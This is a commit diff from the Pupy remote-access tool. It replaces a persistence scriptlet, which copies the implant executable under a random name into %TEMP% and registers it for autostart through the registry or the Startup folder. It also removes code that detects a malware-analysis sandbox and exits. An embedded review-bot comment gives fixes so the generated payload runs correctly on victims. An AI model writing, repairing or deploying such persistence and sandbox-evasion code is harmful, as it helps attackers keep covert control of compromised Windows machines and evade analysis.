improved persistence scriptlet
parent
63881d8ddc
commit
ce784a9469
|
@ -37,6 +37,7 @@ pupy/modules/*.py[cod]
|
||||||
pupy/modules/lib/*.py[cod]
|
pupy/modules/lib/*.py[cod]
|
||||||
pupy/modules/lib/**/*.py[cod]
|
pupy/modules/lib/**/*.py[cod]
|
||||||
pupy/network/**/*.pyc
|
pupy/network/**/*.pyc
|
||||||
|
pupy/scriptlets/**/*.pyc
|
||||||
|
|
||||||
# do not ignore package & templates files
|
# do not ignore package & templates files
|
||||||
!pupy/packages/
|
!pupy/packages/
|
||||||
|
|
|
@ -1,18 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
# -*- coding: UTF8 -*-
|
|
||||||
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
|
|
||||||
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
|
|
||||||
|
|
||||||
|
|
||||||
import subprocess
|
|
||||||
import re
|
|
||||||
try:
|
|
||||||
info = subprocess.STARTUPINFO()
|
|
||||||
info.dwFlags = subprocess.STARTF_USESHOWWINDOW|subprocess.CREATE_NEW_PROCESS_GROUP
|
|
||||||
info.wShowWindow = subprocess.SW_HIDE
|
|
||||||
res=subprocess.Popen(["wmic.exe", "process" ,"get", "/FORMAT:LIST"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=info)
|
|
||||||
if re.search("CommandLine\\s*=\\s*C:\\\\Python27\\\\pythonw.exe\\s+C:\\\\[a-zA-Z0-9]+\\\\analyzer.py",res):
|
|
||||||
exit()
|
|
||||||
except Exception:
|
|
||||||
pass
|
|
||||||
|
|
|
@ -0,0 +1,39 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
# -*- coding: UTF8 -*-
|
||||||
|
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
|
||||||
|
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
|
||||||
|
import textwrap, random, string
|
||||||
|
from scriptlets import *
|
||||||
|
|
||||||
|
class ScriptletGenerator(Scriptlet):
|
||||||
|
""" copy the current pupy executable to a random exe in %TEMP% and add persistency through registry """
|
||||||
|
|
||||||
|
dependencies=[("windows/all/pupwinutils/persistence.py","pupwinutils.persistence")]
|
||||||
|
arguments={
|
||||||
|
'method': 'available methods: registry, startup'
|
||||||
|
}
|
||||||
|
|
||||||
|
def __init__(self, method="registry"):
|
||||||
|
if not method in ("registry", "startup"):
|
||||||
|
raise ScriptletArgumentError("unknown persistence method %s"%method)
|
||||||
|
self.method=method
|
||||||
|
|
||||||
|
def generate(self):
|
||||||
|
name=''.join(random.choice(string.ascii_lowercase) for _ in range(0,7))+".exe"
|
||||||
|
if self.method=="registry":
|
||||||
|
return textwrap.dedent("""
|
||||||
|
import sys, shutil, os.path
|
||||||
|
if sys.platform=="win32":
|
||||||
|
import pupwinutils.persistence
|
||||||
|
path=os.path.join(os.path.expandvars("%TEMP%"), {})
|
||||||
|
shutil.copy(sys.executable, path)
|
||||||
|
pupwinutils.persistence.add_registry_startup(path)
|
||||||
|
""".format(name))
|
||||||
|
else:
|
||||||
|
return textwrap.dedent("""
|
||||||
|
import sys, shutil, os.path
|
||||||
|
if sys.platform=="win32":
|
||||||
|
shutil.copy(sys.executable, os.path.expandvars("%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\{}"))
|
||||||
|
""".format(name))
|
||||||
|
|
||||||
|
|
|
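Review bot: In generate, `name` is interpolated into the generated source unquoted — `.format(name)` on the registry branch emits `path=os.path.join(os.path.expandvars("%TEMP%"), abcdefg.exe)`, which raises NameError on the target as soon as the win32 branch runs (assuming the rendering has not dropped the quotes; the older scriptlet avoided this by generating the name inside the payload). Use `{!r}` in the template so the value lands as a string literal: `path=os.path.join(os.path.expandvars("%TEMP%"), {!r})`. The startup branch has the related problem that the emitted literal `"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\abcdefg.exe"` is not raw, so a name starting with a, b, f, n, r, t or v is mangled by escape processing and one starting with x can fail to compile; build it as `os.path.join(os.path.expandvars("%APPDATA%"), "Microsoft", "Windows", "Start Menu", "Programs", "Startup", {!r})` instead. A one-line docstring on generate saying that the return value is Python source executed on the target would make clear why quoting matters here.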
@ -1,23 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
# -*- coding: UTF8 -*-
|
|
||||||
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
|
|
||||||
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
|
|
||||||
import textwrap, random
|
|
||||||
from scriptlets import *
|
|
||||||
|
|
||||||
class ScriptletGenerator(Scriptlet):
|
|
||||||
""" copy the current pupy executable to a random exe in %TEMP% and add persistency through registry """
|
|
||||||
dependencies=[("windows/all/pupwinutils/persistence.py","pupwinutils.persistence")]
|
|
||||||
def generate(self):
|
|
||||||
return textwrap.dedent("""
|
|
||||||
import sys, shutil, os.path, random, string
|
|
||||||
if sys.platform=="win32":
|
|
||||||
import pupwinutils.persistence
|
|
||||||
random.seed({})
|
|
||||||
name=''.join(random.choice(string.ascii_lowercase) for _ in range(0,7))+".exe"
|
|
||||||
path=os.path.join(os.path.expandvars("%TEMP%"), name)
|
|
||||||
shutil.copy(sys.executable, path)
|
|
||||||
pupwinutils.persistence.add_registry_startup(path)
|
|
||||||
""".format(int(random.getrandbits(32))))
|
|
||||||
|
|
||||||
|
|